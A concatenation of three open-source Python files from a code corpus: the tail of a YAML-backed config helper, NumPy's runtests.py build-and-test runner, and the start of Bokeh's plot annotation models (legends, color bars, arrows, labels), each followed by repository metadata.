config.save() # Only if there were changes to the values.
Quick use::
width = metatools.config.get('your_company/' + __name__, 'width')
metatools.config.set('your_company/' + __name__, 'width', width)
"""
import os
import yaml
class Config(dict):
"""Mapping which persists to disk via YAML serialization.
Use like a dictionary.
"""
def __init__(self, name):
self.name = name
if os.path.isabs(name):
self.path = name
else:
self.path = os.path.expanduser('~/.%s.yml' % name)
self.revert()
def revert(self):
"""Revert to saved state."""
if not os.path.exists(self.path):
self.clear()
else:
saved = yaml.load(open(self.path).read())
self.clear()
self.update(saved)
self.dirty = False
def save(self, force=False):
"""Persist the current contents.
:param bool force: Always write, even if there were no changes.
"""
if not force and not self.dirty:
return
if self:
encoded = yaml.dump(dict(self),
indent=4,
default_flow_style=False,
)
directory = os.path.dirname(self.path)
if not os.path.exists(directory):
os.makedirs(directory)
with open(self.path, 'wb') as fh:
fh.write(encoded)
elif os.path.exists(self.path):
os.unlink(self.path)
def delete(self):
"""Clear and delete; same as clear() and save()."""
self.clear()
if os.path.exists(self.path):
os.unlink(self.path)
def __setitem__(self, key, value):
super(Config, self).__setitem__(key, value)
self.dirty = True
def update(self, *args, **kwargs):
super(Config, self).update(*args, **kwargs)
self.dirty = True
def __delitem__(self, key):
super(Config, self).__delitem__(key)
self.dirty = True
def __enter__(self):
return self
def __exit__(self, type_, value, tb):
if not type_:
self.save()
def get(section, name, *args):
config = Config(section)
try:
return config[name]
except KeyError:
if args:
return args[0]
else:
raise
def set(section, name, value):
config = Config(section)
config[name] = value
config.save()
def main():
import ast
from optparse import OptionParser
optparser = OptionParser('%prog [options] section name [value]')
opts, args = optparser.parse_args()
# Basic get.
if len(args) == 2:
print get(*args)
# Basic set.
elif len(args) == 3:
section, name, raw_value = args
try:
value = ast.literal_eval(raw_value)
except SyntaxError:
value = raw_value
set(section, name, value)
else:
optparser.print_usage()
exit(1)
if __name__ == '__main__':
main()
|
mikeboers/metatools
|
metatools/config.py
|
Python
|
bsd-3-clause
| 3,791
|
#!/usr/bin/env python
"""
runtests.py [OPTIONS] [-- ARGS]
Run tests, building the project first.
Examples::
$ python runtests.py
$ python runtests.py -s {SAMPLE_SUBMODULE}
$ python runtests.py -t {SAMPLE_TEST}
$ python runtests.py --ipython
$ python runtests.py --python somescript.py
$ python runtests.py --bench
$ python runtests.py --durations 20
Run a debugger:
$ gdb --args python runtests.py [...other args...]
Generate C code coverage listing under build/lcov/:
(requires http://ltp.sourceforge.net/coverage/lcov.php)
$ python runtests.py --gcov [...other args...]
$ python runtests.py --lcov-html
"""
from __future__ import division, print_function
#
# This is a generic test runner script for projects using NumPy's test
# framework. Change the following values to adapt to your project:
#
PROJECT_MODULE = "numpy"
PROJECT_ROOT_FILES = ['numpy', 'LICENSE.txt', 'setup.py']
SAMPLE_TEST = "numpy/linalg/tests/test_linalg.py::test_byteorder_check"
SAMPLE_SUBMODULE = "linalg"
EXTRA_PATH = ['/usr/lib/ccache', '/usr/lib/f90cache',
'/usr/local/lib/ccache', '/usr/local/lib/f90cache']
# ---------------------------------------------------------------------
if __doc__ is None:
__doc__ = "Run without -OO if you want usage info"
else:
__doc__ = __doc__.format(**globals())
import sys
import os
# In case we are run from the source directory, we don't want to import the
# project from there:
sys.path.pop(0)
import shutil
import subprocess
import time
from argparse import ArgumentParser, REMAINDER
ROOT_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__)))
def main(argv):
parser = ArgumentParser(usage=__doc__.lstrip())
parser.add_argument("--verbose", "-v", action="count", default=1,
help="more verbosity")
parser.add_argument("--debug-configure", action="store_true",
help=("add -v to build_src to show compiler "
"configuration output while creating "
"_numpyconfig.h and config.h"))
parser.add_argument("--no-build", "-n", action="store_true", default=False,
help="do not build the project (use system installed version)")
parser.add_argument("--build-only", "-b", action="store_true", default=False,
help="just build, do not run any tests")
parser.add_argument("--doctests", action="store_true", default=False,
help="Run doctests in module")
parser.add_argument("--refguide-check", action="store_true", default=False,
help="Run refguide (doctest) check (do not run regular tests.)")
parser.add_argument("--coverage", action="store_true", default=False,
help=("report coverage of project code. HTML output goes "
"under build/coverage"))
parser.add_argument("--durations", action="store", default=-1, type=int,
help=("Time N slowest tests, time all if 0, time none if < 0"))
parser.add_argument("--gcov", action="store_true", default=False,
help=("enable C code coverage via gcov (requires GCC). "
"gcov output goes to build/**/*.gc*"))
parser.add_argument("--lcov-html", action="store_true", default=False,
help=("produce HTML for C code coverage information "
"from a previous run with --gcov. "
"HTML output goes to build/lcov/"))
parser.add_argument("--mode", "-m", default="fast",
help="'fast', 'full', or something that could be "
"passed to nosetests -A [default: fast]")
parser.add_argument("--submodule", "-s", default=None,
help="Submodule whose tests to run (cluster, constants, ...)")
parser.add_argument("--pythonpath", "-p", default=None,
help="Paths to prepend to PYTHONPATH")
parser.add_argument("--tests", "-t", action='append',
help="Specify tests to run")
parser.add_argument("--python", action="store_true",
help="Start a Python shell with PYTHONPATH set")
parser.add_argument("--ipython", "-i", action="store_true",
help="Start IPython shell with PYTHONPATH set")
parser.add_argument("--shell", action="store_true",
help="Start Unix shell with PYTHONPATH set")
parser.add_argument("--debug", "-g", action="store_true",
help="Debug build")
parser.add_argument("--parallel", "-j", type=int, default=0,
help="Number of parallel jobs during build")
parser.add_argument("--warn-error", action="store_true",
help="Set -Werror to convert all compiler warnings to errors")
parser.add_argument("--show-build-log", action="store_true",
help="Show build output rather than using a log file")
parser.add_argument("--bench", action="store_true",
help="Run benchmark suite instead of test suite")
parser.add_argument("--bench-compare", action="store", metavar="COMMIT",
help=("Compare benchmark results of current HEAD to "
"BEFORE. Use an additional "
"--bench-compare=COMMIT to override HEAD with "
"COMMIT. Note that you need to commit your "
"changes first!"))
parser.add_argument("args", metavar="ARGS", default=[], nargs=REMAINDER,
help="Arguments to pass to Nose, Python or shell")
args = parser.parse_args(argv)
if args.durations < 0:
args.durations = -1
if args.bench_compare:
args.bench = True
args.no_build = True # ASV does the building
if args.lcov_html:
# generate C code coverage output
lcov_generate()
sys.exit(0)
if args.pythonpath:
for p in reversed(args.pythonpath.split(os.pathsep)):
sys.path.insert(0, p)
if args.gcov:
gcov_reset_counters()
if args.debug and args.bench:
print("*** Benchmarks should not be run against debug "
"version; remove -g flag ***")
if not args.no_build:
# we need the noarch path in case the package is pure python.
site_dir, site_dir_noarch = build_project(args)
sys.path.insert(0, site_dir)
sys.path.insert(0, site_dir_noarch)
os.environ['PYTHONPATH'] = site_dir + os.pathsep + site_dir_noarch
else:
_temp = __import__(PROJECT_MODULE)
site_dir = os.path.sep.join(_temp.__file__.split(os.path.sep)[:-2])
extra_argv = args.args[:]
if extra_argv and extra_argv[0] == '--':
extra_argv = extra_argv[1:]
if args.python:
# Debugging issues with warnings is much easier if you can see them
print("Enabling display of all warnings")
import warnings
import types
warnings.filterwarnings("always")
if extra_argv:
# Don't use subprocess, since we don't want to include the
# current path in PYTHONPATH.
sys.argv = extra_argv
with open(extra_argv[0], 'r') as f:
script = f.read()
sys.modules['__main__'] = types.ModuleType('__main__')
ns = dict(__name__='__main__',
__file__=extra_argv[0])
exec_(script, ns)
sys.exit(0)
else:
import code
code.interact()
sys.exit(0)
if args.ipython:
# Debugging issues with warnings is much easier if you can see them
print("Enabling display of all warnings and pre-importing numpy as np")
import warnings; warnings.filterwarnings("always")
import IPython
import numpy as np
IPython.embed(user_ns={"np": np})
sys.exit(0)
if args.shell:
shell = os.environ.get('SHELL', 'cmd' if os.name == 'nt' else 'sh')
print("Spawning a shell ({})...".format(shell))
subprocess.call([shell] + extra_argv)
sys.exit(0)
if args.coverage:
dst_dir = os.path.join(ROOT_DIR, 'build', 'coverage')
fn = os.path.join(dst_dir, 'coverage_html.js')
if os.path.isdir(dst_dir) and os.path.isfile(fn):
shutil.rmtree(dst_dir)
extra_argv += ['--cov-report=html:' + dst_dir]
if args.refguide_check:
cmd = [os.path.join(ROOT_DIR, 'tools', 'refguide_check.py'),
'--doctests']
if args.submodule:
cmd += [args.submodule]
os.execv(sys.executable, [sys.executable] + cmd)
sys.exit(0)
if args.bench:
# Run ASV
items = extra_argv
if args.tests:
items += args.tests
if args.submodule:
items += [args.submodule]
bench_args = []
for a in items:
bench_args.extend(['--bench', a])
if not args.bench_compare:
cmd = ['asv', 'run', '-n', '-e', '--python=same'] + bench_args
ret = subprocess.call(cmd, cwd=os.path.join(ROOT_DIR, 'benchmarks'))
sys.exit(ret)
else:
commits = [x.strip() for x in args.bench_compare.split(',')]
if len(commits) == 1:
commit_a = commits[0]
commit_b = 'HEAD'
elif len(commits) == 2:
commit_a, commit_b = commits
else:
p.error("Too many commits to compare benchmarks for")
# Check for uncommitted files
if commit_b == 'HEAD':
r1 = subprocess.call(['git', 'diff-index', '--quiet',
'--cached', 'HEAD'])
r2 = subprocess.call(['git', 'diff-files', '--quiet'])
if r1 != 0 or r2 != 0:
print("*"*80)
print("WARNING: you have uncommitted changes --- "
"these will NOT be benchmarked!")
print("*"*80)
# Fix commit ids (HEAD is local to current repo)
out = subprocess.check_output(['git', 'rev-parse', commit_b])
commit_b = out.strip().decode('ascii')
out = subprocess.check_output(['git', 'rev-parse', commit_a])
commit_a = out.strip().decode('ascii')
cmd = ['asv', 'continuous', '-e', '-f', '1.05',
commit_a, commit_b] + bench_args
ret = subprocess.call(cmd, cwd=os.path.join(ROOT_DIR, 'benchmarks'))
sys.exit(ret)
if args.build_only:
sys.exit(0)
else:
__import__(PROJECT_MODULE)
test = sys.modules[PROJECT_MODULE].test
if args.submodule:
tests = [PROJECT_MODULE + "." + args.submodule]
elif args.tests:
tests = args.tests
else:
tests = None
# Run the tests under build/test
if not args.no_build:
test_dir = site_dir
else:
test_dir = os.path.join(ROOT_DIR, 'build', 'test')
if not os.path.isdir(test_dir):
os.makedirs(test_dir)
shutil.copyfile(os.path.join(ROOT_DIR, '.coveragerc'),
os.path.join(test_dir, '.coveragerc'))
cwd = os.getcwd()
try:
os.chdir(test_dir)
result = test(args.mode,
verbose=args.verbose,
extra_argv=extra_argv,
doctests=args.doctests,
coverage=args.coverage,
durations=args.durations,
tests=tests)
finally:
os.chdir(cwd)
if isinstance(result, bool):
sys.exit(0 if result else 1)
elif result.wasSuccessful():
sys.exit(0)
else:
sys.exit(1)
def build_project(args):
"""
Build a dev version of the project.
Returns
-------
site_dir
site-packages directory where it was installed
"""
import distutils.sysconfig
root_ok = [os.path.exists(os.path.join(ROOT_DIR, fn))
for fn in PROJECT_ROOT_FILES]
if not all(root_ok):
print("To build the project, run runtests.py in "
"git checkout or unpacked source")
sys.exit(1)
dst_dir = os.path.join(ROOT_DIR, 'build', 'testenv')
env = dict(os.environ)
cmd = [sys.executable, 'setup.py']
# Always use ccache, if installed
env['PATH'] = os.pathsep.join(EXTRA_PATH + env.get('PATH', '').split(os.pathsep))
cvars = distutils.sysconfig.get_config_vars()
compiler = env.get('CC') or cvars.get('CC', '')
if 'gcc' in compiler:
# Check that this isn't clang masquerading as gcc.
if sys.platform != 'darwin' or 'gnu-gcc' in compiler:
# add flags used as werrors
warnings_as_errors = ' '.join([
# from tools/travis-test.sh
'-Werror=vla',
'-Werror=nonnull',
'-Werror=pointer-arith',
'-Wlogical-op',
# from sysconfig
'-Werror=unused-function',
])
env['CFLAGS'] = warnings_as_errors + ' ' + env.get('CFLAGS', '')
if args.debug or args.gcov:
# assume everyone uses gcc/gfortran
env['OPT'] = '-O0 -ggdb'
env['FOPT'] = '-O0 -ggdb'
if args.gcov:
env['OPT'] = '-O0 -ggdb'
env['FOPT'] = '-O0 -ggdb'
env['CC'] = cvars['CC'] + ' --coverage'
env['CXX'] = cvars['CXX'] + ' --coverage'
env['F77'] = 'gfortran --coverage '
env['F90'] = 'gfortran --coverage '
env['LDSHARED'] = cvars['LDSHARED'] + ' --coverage'
env['LDFLAGS'] = " ".join(cvars['LDSHARED'].split()[1:]) + ' --coverage'
cmd += ["build"]
if args.parallel > 1:
cmd += ["-j", str(args.parallel)]
if args.debug_configure:
cmd += ["build_src", "--verbose"]
if args.warn_error:
cmd += ["--warn-error"]
# Install; avoid producing eggs so numpy can be imported from dst_dir.
cmd += ['install', '--prefix=' + dst_dir,
'--single-version-externally-managed',
'--record=' + dst_dir + 'tmp_install_log.txt']
from distutils.sysconfig import get_python_lib
site_dir = get_python_lib(prefix=dst_dir, plat_specific=True)
site_dir_noarch = get_python_lib(prefix=dst_dir, plat_specific=False)
# easy_install won't install to a path that Python by default cannot see
# and isn't on the PYTHONPATH. Plus, it has to exist.
if not os.path.exists(site_dir):
os.makedirs(site_dir)
if not os.path.exists(site_dir_noarch):
os.makedirs(site_dir_noarch)
env['PYTHONPATH'] = site_dir + ':' + site_dir_noarch
log_filename = os.path.join(ROOT_DIR, 'build.log')
if args.show_build_log:
ret = subprocess.call(cmd, env=env, cwd=ROOT_DIR)
else:
log_filename = os.path.join(ROOT_DIR, 'build.log')
print("Building, see build.log...")
with open(log_filename, 'w') as log:
p = subprocess.Popen(cmd, env=env, stdout=log, stderr=log,
cwd=ROOT_DIR)
try:
# Wait for it to finish, and print something to indicate the
# process is alive, but only if the log file has grown (to
# allow continuous integration environments kill a hanging
# process accurately if it produces no output)
last_blip = time.time()
last_log_size = os.stat(log_filename).st_size
while p.poll() is None:
time.sleep(0.5)
if time.time() - last_blip > 60:
log_size = os.stat(log_filename).st_size
if log_size > last_log_size:
print(" ... build in progress")
last_blip = time.time()
last_log_size = log_size
ret = p.wait()
except:
p.kill()
p.wait()
raise
if ret == 0:
print("Build OK")
else:
if not args.show_build_log:
with open(log_filename, 'r') as f:
print(f.read())
print("Build failed!")
sys.exit(1)
return site_dir, site_dir_noarch
#
# GCOV support
#
def gcov_reset_counters():
print("Removing previous GCOV .gcda files...")
build_dir = os.path.join(ROOT_DIR, 'build')
for dirpath, dirnames, filenames in os.walk(build_dir):
for fn in filenames:
if fn.endswith('.gcda') or fn.endswith('.da'):
pth = os.path.join(dirpath, fn)
os.unlink(pth)
#
# LCOV support
#
LCOV_OUTPUT_FILE = os.path.join(ROOT_DIR, 'build', 'lcov.out')
LCOV_HTML_DIR = os.path.join(ROOT_DIR, 'build', 'lcov')
def lcov_generate():
try: os.unlink(LCOV_OUTPUT_FILE)
except OSError: pass
try: shutil.rmtree(LCOV_HTML_DIR)
except OSError: pass
print("Capturing lcov info...")
subprocess.call(['lcov', '-q', '-c',
'-d', os.path.join(ROOT_DIR, 'build'),
'-b', ROOT_DIR,
'--output-file', LCOV_OUTPUT_FILE])
print("Generating lcov HTML output...")
ret = subprocess.call(['genhtml', '-q', LCOV_OUTPUT_FILE,
'--output-directory', LCOV_HTML_DIR,
'--legend', '--highlight'])
if ret != 0:
print("genhtml failed!")
else:
print("HTML output generated under build/lcov/")
#
# Python 3 support
#
if sys.version_info[0] >= 3:
import builtins
exec_ = getattr(builtins, "exec")
else:
def exec_(code, globs=None, locs=None):
"""Execute code in a namespace."""
if globs is None:
frame = sys._getframe(1)
globs = frame.f_globals
if locs is None:
locs = frame.f_locals
del frame
elif locs is None:
locs = globs
exec("""exec code in globs, locs""")
if __name__ == "__main__":
main(argv=sys.argv[1:])
|
MSeifert04/numpy
|
runtests.py
|
Python
|
bsd-3-clause
| 18,292
|
''' Renderers for various kinds of annotations that can be added to
Bokeh plots
'''
from __future__ import absolute_import
from six import string_types
from ..core.enums import (AngleUnits, Dimension, FontStyle, LegendClickPolicy, LegendLocation,
Orientation, RenderMode, SpatialUnits, TextAlign)
from ..core.has_props import abstract
from ..core.properties import (Angle, AngleSpec, Auto, Bool, ColorSpec, Datetime, Dict, DistanceSpec, Either,
Enum, Float, FontSizeSpec, Include, Instance, Int, List, NumberSpec, Override,
Seq, String, StringSpec, Tuple, value)
from ..core.property_mixins import FillProps, LineProps, TextProps
from ..core.validation import error
from ..core.validation.errors import BAD_COLUMN_NAME, NON_MATCHING_DATA_SOURCES_ON_LEGEND_ITEM_RENDERERS
from ..model import Model
from ..util.serialization import convert_datetime_type
from .formatters import BasicTickFormatter, TickFormatter
from .mappers import ContinuousColorMapper
from .renderers import GlyphRenderer, Renderer
from .sources import ColumnDataSource, DataSource
from .tickers import BasicTicker, Ticker
@abstract
class Annotation(Renderer):
''' Base class for all annotation models.
'''
plot = Instance(".models.plots.Plot", help="""
The plot to which this annotation is attached.
""")
level = Override(default="annotation")
@abstract
class TextAnnotation(Annotation):
''' Base class for text annotation models such as labels and titles.
'''
class LegendItem(Model):
'''
'''
def __init__(self, *args, **kwargs):
super(LegendItem, self).__init__(*args, **kwargs)
if isinstance(self.label, string_types):
# Allow convenience of setting label as a string
self.label = value(self.label)
label = StringSpec(default=None, help="""
A label for this legend. Can be a string, or a column of a
ColumnDataSource. If ``label`` is a field, then it must
be in the renderers' data_source.
""")
renderers = List(Instance(GlyphRenderer), help="""
A list of the glyph renderers to draw in the legend. If ``label`` is a field,
then all data_sources of renderers must be the same.
""")
@error(NON_MATCHING_DATA_SOURCES_ON_LEGEND_ITEM_RENDERERS)
def _check_data_sources_on_renderers(self):
if self.label and 'field' in self.label:
if len({r.data_source for r in self.renderers}) != 1:
return str(self)
@error(BAD_COLUMN_NAME)
def _check_field_label_on_data_source(self):
if self.label and 'field' in self.label:
if len(self.renderers) < 1:
return str(self)
source = self.renderers[0].data_source
if self.label.get('field') not in source.column_names:
return str(self)
class Legend(Annotation):
''' Render informational legends for a plot.
'''
location = Either(Enum(LegendLocation), Tuple(Float, Float), default="top_right", help="""
The location where the legend should draw itself. It's either one of
``bokeh.core.enums.LegendLocation``'s enumerated values, or a ``(x, y)``
tuple indicating an absolute location absolute location in screen
coordinates (pixels from the bottom-left corner).
""")
orientation = Enum(Orientation, default="vertical", help="""
Whether the legend entries should be placed vertically or horizontally
when they are drawn.
""")
border_props = Include(LineProps, help="""
The %s for the legend border outline.
""")
border_line_color = Override(default="#e5e5e5")
border_line_alpha = Override(default=0.5)
background_props = Include(FillProps, help="""
The %s for the legend background style.
""")
inactive_props = Include(FillProps, help="""
The %s for the legend background style when inactive.
""")
click_policy = Enum(LegendClickPolicy, default="none", help="""
Defines what happens when a lengend's item is clicked.
""")
background_fill_color = Override(default="#ffffff")
background_fill_alpha = Override(default=0.95)
inactive_fill_color = Override(default="white")
inactive_fill_alpha = Override(default=0.9)
label_props = Include(TextProps, help="""
The %s for the legend labels.
""")
label_text_baseline = Override(default='middle')
label_text_font_size = Override(default={'value': '10pt'})
label_standoff = Int(5, help="""
The distance (in pixels) to separate the label from its associated glyph.
""")
label_height = Int(20, help="""
The minimum height (in pixels) of the area that legend labels should occupy.
""")
label_width = Int(20, help="""
The minimum width (in pixels) of the area that legend labels should occupy.
""")
glyph_height = Int(20, help="""
The height (in pixels) that the rendered legend glyph should occupy.
""")
glyph_width = Int(20, help="""
The width (in pixels) that the rendered legend glyph should occupy.
""")
margin = Int(10, help="""
Amount of margin around the legend.
""")
padding = Int(10, help="""
Amount of padding around the contents of the legend. Only applicable when
when border is visible, otherwise collapses to 0.
""")
spacing = Int(3, help="""
Amount of spacing (in pixles) between legend entries.
""")
items = List(Instance(LegendItem), help="""
A list of :class:`~bokeh.model.annotations.LegendItem` instances to be
rendered in the legend.
This can be specified explicitly, for instance:
.. code-block:: python
legend = Legend(items=[
LegendItem(label="sin(x)" , renderers=[r0, r1]),
LegendItem(label="2*sin(x)" , renderers=[r2]),
LegendItem(label="3*sin(x)" , renderers=[r3, r4])
])
But as a convenience, can also be given more compactly as a list of tuples:
.. code-block:: python
legend = Legend(items=[
("sin(x)" , [r0, r1]),
("2*sin(x)" , [r2]),
("3*sin(x)" , [r3, r4])
])
where each tuple is of the form: *(label, renderers)*.
""").accepts(List(Tuple(String, List(Instance(GlyphRenderer)))), lambda items: [LegendItem(label=item[0], renderers=item[1]) for item in items])
class ColorBar(Annotation):
''' Render a color bar based on a color mapper.
'''
location = Either(Enum(LegendLocation), Tuple(Float, Float),
default="top_right", help="""
The location where the color bar should draw itself. It's either one of
``bokeh.core.enums.LegendLocation``'s enumerated values, or a ``(x, y)``
tuple indicating an absolute location absolute location in screen
coordinates (pixels from the bottom-left corner).
.. warning::
If the color bar is placed in a side panel, the location will likely
have to be set to `(0,0)`.
""")
orientation = Enum(Orientation, default="vertical", help="""
Whether the color bar should be oriented vertically or horizontally.
""")
height = Either(Auto, Int(), help="""
The height (in pixels) that the color scale should occupy.
""")
width = Either(Auto, Int(), help="""
The width (in pixels) that the color scale should occupy.
""")
scale_alpha = Float(1.0, help="""
The alpha with which to render the color scale.
""")
title = String(help="""
The title text to render.
""")
title_props = Include(TextProps, help="""
The %s values for the title text.
""")
title_text_font_size = Override(default={'value': "10pt"})
title_text_font_style = Override(default="italic")
title_standoff = Int(2, help="""
The distance (in pixels) to separate the title from the color bar.
""")
ticker = Instance(Ticker, default=lambda: BasicTicker(), help="""
A Ticker to use for computing locations of axis components.
""")
formatter = Instance(TickFormatter, default=lambda: BasicTickFormatter(), help="""
A TickFormatter to use for formatting the visual appearance of ticks.
""")
major_label_overrides = Dict(Either(Float, String), String, default={}, help="""
Provide explicit tick label values for specific tick locations that
override normal formatting.
""")
color_mapper = Instance(ContinuousColorMapper, help="""
A continuous color mapper containing a color palette to render.
.. warning::
If the `low` and `high` attributes of the ColorMapper aren't set, ticks
and tick labels won't be rendered. Additionally, if a LogTicker is
passed to the `ticker` argument and either or both of the logarithms
of `low` and `high` values of the color_mapper are non-numeric
(i.e. `low=0`), the tick and tick labels won't be rendered.
""")
margin = Int(30, help="""
Amount of margin (in pixels) around the outside of the color bar.
""")
padding = Int(10, help="""
Amount of padding (in pixels) between the color scale and color bar border.
""")
major_label_props = Include(TextProps, help="""
The %s of the major tick labels.
""")
major_label_text_align = Override(default="center")
major_label_text_baseline = Override(default="middle")
major_label_text_font_size = Override(default={'value': "8pt"})
label_standoff = Int(5, help="""
The distance (in pixels) to separate the tick labels from the color bar.
""")
major_tick_props = Include(LineProps, help="""
The %s of the major ticks.
""")
major_tick_line_color = Override(default="#ffffff")
major_tick_in = Int(default=5, help="""
The distance (in pixels) that major ticks should extend into the
main plot area.
""")
major_tick_out = Int(default=0, help="""
The distance (in pixels) that major ticks should extend out of the
main plot area.
""")
minor_tick_props = Include(LineProps, help="""
The %s of the minor ticks.
""")
minor_tick_line_color = Override(default=None)
minor_tick_in = Int(default=0, help="""
The distance (in pixels) that minor ticks should extend into the
main plot area.
""")
minor_tick_out = Int(default=0, help="""
The distance (in pixels) that major ticks should extend out of the
main plot area.
""")
bar_props = Include(LineProps, help="""
The %s for the color scale bar outline.
""")
bar_line_color = Override(default=None)
border_props = Include(LineProps, help="""
The %s for the color bar border outline.
""")
border_line_color = Override(default=None)
background_props = Include(FillProps, help="""
The %s for the color bar background style.
""")
background_fill_color = Override(default="#ffffff")
background_fill_alpha = Override(default=0.95)
# This only exists to prevent a circular import.
def _DEFAULT_ARROW():
from .arrow_heads import OpenHead
return OpenHead()
class Arrow(Annotation):
''' Render an arrow as an annotation.
'''
x_start = NumberSpec(help="""
The x-coordinates to locate the start of the arrows.
""")
y_start = NumberSpec(help="""
The y-coordinates to locate the start of the arrows.
""")
start_units = Enum(SpatialUnits, default='data', help="""
The unit type for the start_x and start_y attributes. Interpreted as "data
space" units by default.
""")
start = Instance('.models.arrow_heads.ArrowHead', default=None, help="""
Instance of ArrowHead.
""")
x_end = NumberSpec(help="""
The x-coordinates to locate the end of the arrows.
""")
y_end = NumberSpec(help="""
The y-coordinates to locate the end of the arrows.
""")
end_units = Enum(SpatialUnits, default='data', help="""
The unit type for the end_x and end_y attributes. Interpreted as "data
space" units by default.
""")
end = Instance('.models.arrow_heads.ArrowHead', default=_DEFAULT_ARROW, help="""
Instance of ArrowHead.
""")
body_props = Include(LineProps, use_prefix=False, help="""
The %s values for the arrow body.
""")
source = Instance(DataSource, help="""
Local data source to use when rendering annotations on the plot.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default y-range.
""")
class BoxAnnotation(Annotation):
''' Render a shaded rectangular region as an annotation.
'''
left = Either(Auto, NumberSpec(), default=None, help="""
The x-coordinates of the left edge of the box annotation.
Datetime values are also accepted, but note that they are immediately
converted to milliseconds-since-epoch.
""")
left_units = Enum(SpatialUnits, default='data', help="""
The unit type for the left attribute. Interpreted as "data space" units
by default.
""")
right = Either(Auto, NumberSpec(), default=None, help="""
The x-coordinates of the right edge of the box annotation.
Datetime values are also accepted, but note that they are immediately
converted to milliseconds-since-epoch.
""")
right_units = Enum(SpatialUnits, default='data', help="""
The unit type for the right attribute. Interpreted as "data space" units
by default.
""")
bottom = Either(Auto, NumberSpec(), default=None, help="""
The y-coordinates of the bottom edge of the box annotation.
Datetime values are also accepted, but note that they are immediately
converted to milliseconds-since-epoch.
""")
bottom_units = Enum(SpatialUnits, default='data', help="""
The unit type for the bottom attribute. Interpreted as "data space" units
by default.
""")
top = Either(Auto, NumberSpec(), default=None, help="""
The y-coordinates of the top edge of the box annotation.
Datetime values are also accepted, but note that they are immediately
converted to milliseconds-since-epoch.
""")
top_units = Enum(SpatialUnits, default='data', help="""
The unit type for the top attribute. Interpreted as "data space" units
by default.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen locations when
rendering box annotations on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen locations when
rendering box annotations on the plot. If unset, use the default y-range.
""")
line_props = Include(LineProps, use_prefix=False, help="""
The %s values for the box.
""")
line_alpha = Override(default=0.3)
line_color = Override(default="#cccccc")
fill_props = Include(FillProps, use_prefix=False, help="""
The %s values for the box.
""")
fill_alpha = Override(default=0.4)
fill_color = Override(default="#fff9ba")
render_mode = Enum(RenderMode, default="canvas", help="""
Specifies whether the box is rendered as a canvas element or as an
css element overlaid on the canvas. The default mode is "canvas".
.. warning::
The line_dash and line_dash_offset attributes aren't supported if
the render_mode is set to "css"
""")
class Band(Annotation):
''' Render a filled area band along a dimension.
'''
lower = DistanceSpec(help="""
The coordinates of the lower portion of the filled area band.
""")
upper = DistanceSpec(help="""
The coordinations of the upper portion of the filled area band.
""")
base = DistanceSpec(help="""
The orthogonal coordinates of the upper and lower values.
""")
dimension = Enum(Dimension, default='height', help="""
The direction of the band.
""")
source = Instance(DataSource, default=lambda: ColumnDataSource(), help="""
Local data source to use when rendering annotations on the plot.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default y-range.
""")
line_props = Include(LineProps, use_prefix=False, help="""
The %s values for the band.
""")
line_alpha = Override(default=0.3)
line_color = Override(default="#cccccc")
fill_props = Include(FillProps, use_prefix=False, help="""
The %s values for the band.
""")
fill_alpha = Override(default=0.4)
fill_color = Override(default="#fff9ba")
class Label(TextAnnotation):
''' Render a single text label as an annotation.
``Label`` will render a single text label at given ``x`` and ``y``
coordinates, which can be in either screen (pixel) space, or data (axis
range) space.
The label can also be configured with a screen space offset from ``x`` and
``y``, by using the ``x_offset`` and ``y_offset`` properties.
Additionally, the label can be rotated with the ``angle`` property.
There are also standard text, fill, and line properties to control the
appearance of the text, its background, as well as the rectangular bounding
box border.
'''
x = Float(help="""
The x-coordinate in screen coordinates to locate the text anchors.
Datetime values are also accepted, but note that they are immediately
converted to milliseconds-since-epoch.
""").accepts(Datetime, convert_datetime_type)
x_units = Enum(SpatialUnits, default='data', help="""
The unit type for the x attribute. Interpreted as "data space" units
by default.
""")
y = Float(help="""
The y-coordinate in screen coordinates to locate the text anchors.
Datetime values are also accepted, but note that they are immediately
converted to milliseconds-since-epoch.
""").accepts(Datetime, convert_datetime_type)
y_units = Enum(SpatialUnits, default='data', help="""
The unit type for the y attribute. Interpreted as "data space" units
by default.
""")
text = String(help="""
The text value to render.
""")
angle = Angle(default=0, help="""
The angle to rotate the text, as measured from the horizontal.
.. warning::
The center of rotation for canvas and css render_modes is different.
For `render_mode="canvas"` the label is rotated from the top-left
corner of the annotation, while for `render_mode="css"` the annotation
is rotated around it's center.
""")
angle_units = Enum(AngleUnits, default='rad', help="""
Acceptable values for units are ``"rad"`` and ``"deg"``
""")
x_offset = Float(default=0, help="""
Offset value to apply to the x-coordinate.
This is useful, for instance, if it is desired to "float" text a fixed
distance in screen units from a given data position.
""")
y_offset = Float(default=0, help="""
Offset value to apply to the y-coordinate.
This is useful, for instance, if it is desired to "float" text a fixed
distance in screen units from a given data position.
""")
# TODO (bev) these should probably not be dataspec properties
text_props = Include(TextProps, use_prefix=False, help="""
The %s values for the text.
""")
# TODO (bev) these should probably not be dataspec properties
background_props = Include(FillProps, use_prefix=True, help="""
The %s values for the text bounding box.
""")
background_fill_color = Override(default=None)
# TODO (bev) these should probably not be dataspec properties
border_props = Include(LineProps, use_prefix=True, help="""
The %s values for the text bounding box.
""")
border_line_color = Override(default=None)
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen location when
rendering an annotation on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen location when
rendering an annotation on the plot. If unset, use the default y-range.
""")
render_mode = Enum(RenderMode, default="canvas", help="""
Specifies whether the text is rendered as a canvas element or as an
css element overlaid on the canvas. The default mode is "canvas".
.. note::
The CSS labels won't be present in the output using the "save" tool.
.. warning::
Not all visual styling properties are supported if the render_mode is
set to "css". The border_line_dash property isn't fully supported and
border_line_dash_offset isn't supported at all. Setting text_alpha will
modify the opacity of the entire background box and border in addition
to the text. Finally, clipping Label annotations inside of the plot
area isn't supported in "css" mode.
""")
class LabelSet(TextAnnotation):
''' Render multiple text labels as annotations.
